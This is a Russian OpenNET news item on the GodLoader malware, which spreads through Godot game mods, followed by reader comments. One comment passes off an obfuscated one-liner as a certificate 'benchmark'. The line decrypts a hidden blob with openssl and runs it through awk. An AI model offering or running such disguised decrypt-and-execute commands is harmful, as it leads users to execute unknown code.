The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Обнаружено вредоносное ПО, использующее игровой движок Godot как платформу для запуска

30.11.2024 22:53

Компания Checkpoint сообщила о выявлении вредоносного ПО GodLoader, написанного на языке GDScript и использующего открытый игровой движок Godot для своего выполнения (движок Godot применяется как платформа для запуска). Написание кода на GDScript позволило распространять вредоносные программы среди любителей компьютерных игр под видом модов к играм и игровых ресурсов в формате pck, обрабатываемых движком Godot. Использование GDScript также дало возможность не зависеть от операционной системы, которая установлена у пользователя (Windows, macOS, Linux, Android и iOS).

Так как для выполнения программ на GDScript требуется наличие движка Godot, основной целью атаки были пользователи игр на данном движке. Самые ранние варианты нового вредоносного ПО датированы 29 июня. Всего зафиксировано более 17 тысяч систем поражённых GodLoader. Как правило жертвы атаки загружали со сторонних ресурсов и подставных репозиториев на GitHub непроверенные pck-архивы c интегрированным GodLoader. После выполнения размещённого в архиве скрипта на языке GDScript, GodLoader осуществлял загрузку и запуск дополнительных вредоносных компонентов, совершающих такие действия как майнинг криптовалюты и отправку с системы пользователя сохранённых паролей и ключей доступа.



  1. Главная ссылка к новости (https://research.checkpoint.co...)
  2. OpenNews: Проект GodotOS подготовил оболочку операционной системы на игровом движке Godot
  3. OpenNews: Выпуск открытого игрового движка Godot 4.3
  4. OpenNews: Библиотека LibGodot для встраивания в приложения сцен, созданных для игрового движка Godot
  5. OpenNews: Распространение вредоносного ПО через рекламу домена, неотличимого от домена проекта KeePass
  6. OpenNews: Смена владельца библиотеки Polyfill привела к подстановке вредоносного кода на 110 тысяч сайтов
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/62323-godloader
Ключевые слова: godloader, godot
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (16) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.2, Аноним (2), 23:12, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ох уж эти злые дядьки из Checkpoint, всю малину портят. Сидели бы молча. И вообще, как они не распустились после того как натворили дел в виндой.
     
  • 1.3, Bottle (?), 23:33, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Это самое полезное, что произвёл на свет Godot - потому что кроме вирусни он породил не менее фанатичное сообщество, сравнивающее свою тормозную поделку с Блендером уже на протяжении десятка лет.
     
     
  • 2.5, Dzen Python (ok), 23:40, 30/11/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А как же змейка?
     
     
  • 3.8, Bottle (?), 00:56, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Статтеры присутствуют. Я лично испытывал "заикания" в демках, которые выдают 90 FPS и выше. Только недавно начали править frame pacing, и то, это не первый pull request в попытке исправить проблему.
    https://github.com/godotengine/godot/pull/99833
     

  • 1.4, Dzen Python (ok), 23:36, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Я щас расскажу дядям из Checkpoint про js-майнеры, так они вообще наверное, аж пеной изойдут. Или про вредоносы на lua... Тайпсквотнутые клоны пакетов со вставками для питона в pip... Или любимые виндунами однострочники на Мощщщной Раковине...
     
     
  • 2.7, Аноним (7), 23:57, 30/11/2024 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 2.9, Аноним (9), 01:32, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    > Или любимые виндунами однострочники на Мощщщной Раковине...

    Эти "однострочники" в 4K экран 4px шрифтом хоть помещаются? 😲

    А вот, кстати, однострочный (влазит в экран ноута) э-э-э, бенчмарк валидации серта опеннета:
    [CODE]
    time echo "U2FsdGVkX1856bpfItIkP2IgSTHMlQT/njNhocA8+gcuSaNCQ78lIr29hCDwKSns\nmarNmtq4gEG0hv6kd8CihCSQqGHmptqXZg9XtNQcBj8="|openssl aes-256-cbc -d -a -k opennet.ru |xargs -0I% awk '%'
    [/CODE]

     
  • 2.14, fuggy (ok), 03:09, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Вот это да. Шок. На тьюринг-полном языке можно написать вредоносные код.
     

  • 1.6, Аноним (6), 23:41, 30/11/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    О, в очередной вредоносов пользователи налили сами себе. Ждем следующим шагом слабо рецензируемый Comprehensive Godot Archive Network, в который централизованно будут лить вредоносов под видом минифорков с тайпсквоттинговыми  названием. Сколько уже можно ходить по одному и тому же кругу.
     
  • 1.10, Крикет (?), 01:53, 01/12/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Игры нужно делать на своих минималистичных и быстрых движках, а не использовать всякое тормозное и глючное нечто по типу урина энджин.
     
     
  • 2.11, Bottle (?), 02:01, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    General purpose движки нужны, другое дело, что Godot - это способ осваивания средств через окучивание народа и прогрева на донаты.
    Потому что тот же Хуан Линецкий в одну руку принимает донаты через Godot Foundation, через другую - продаёт сервисы к движку (например, оптимизированные мобильные билды от Ramatak) и замедляет его разработку.
     
  • 2.12, Bottle (?), 02:08, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    При этом у него никогда стояло цели делать на нём игры - он лично разрабатывал для четвёртой версии систему глобального освещения SDFGI, специально скрывая на демонстрационных видео тот факт, что система даёт просадки FPS при любом повороте камеры. Он сделал это осознанно.
     
  • 2.15, fuggy (ok), 03:15, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    То есть Godot для тебя не минималистичный и быстрый. Тогда Unreal вообще галактического размера для тебя.
    Так то есть ты предлагаешь использовать движки написанные васяном за пачку чипсов на VB в котором полвторы функции? Или для каждой игры писать свой движок с нуля?
     

  • 1.13, Аноним (13), 02:58, 01/12/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    А уж игры для ScummVM-то... Сам ScummVM написан на сишке (то есть по русски - вредоносные ресурсы смогут исполнить произвольный код даже если в движке такой функции не накодено), да ещё многие игры для ResidualVM (ну то есть те, которые ScummVM унаследовала от  ResidualVM, плюс последние поступления) основаны на Lua (что есть явный запуск произвольного кода).


    Это не говоря уже о других играх на альтернативных движках. Там зачастую то же самое, что и в Lua, только на никому не известном костыльном ЯП, который никто кроме создателей игры, злоумышленника, и мод-сообщества не знает.

    Что делать? Тотальное огораживание через landlock как минимум на самых ранних стадиях старта движка, с разрешённой записью только в файлы сейвов, разрешённым чтением только на файлы ресурсов и сейвов, и разрешёнными ioctlами только на устройство GPU. К сожалению - ни в одном альтернативном движке не видел такого. А в стоковых и подавно такого не будет.

     
     
  • 2.17, fuggy (ok), 03:24, 01/12/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Так а кто будет прописывать список разрешённых файлов. Вот этот мод условно пропишет себе что для него сейвы храняться в /usr/bin, а ресурсы хранятся в /etc/passwd и всё. Понятно это условно, но доступ к /home для всех приложений открыт, а юзер сам запустил приложение без проверки.
    И вообще на Godot модули можно и на C# и на C++ писать. А там можно разгуляться.
     

  • 1.16, Аноним (16), 03:16, 01/12/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Какой смысл в новых играх, если есть сотни тысяч старых?
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру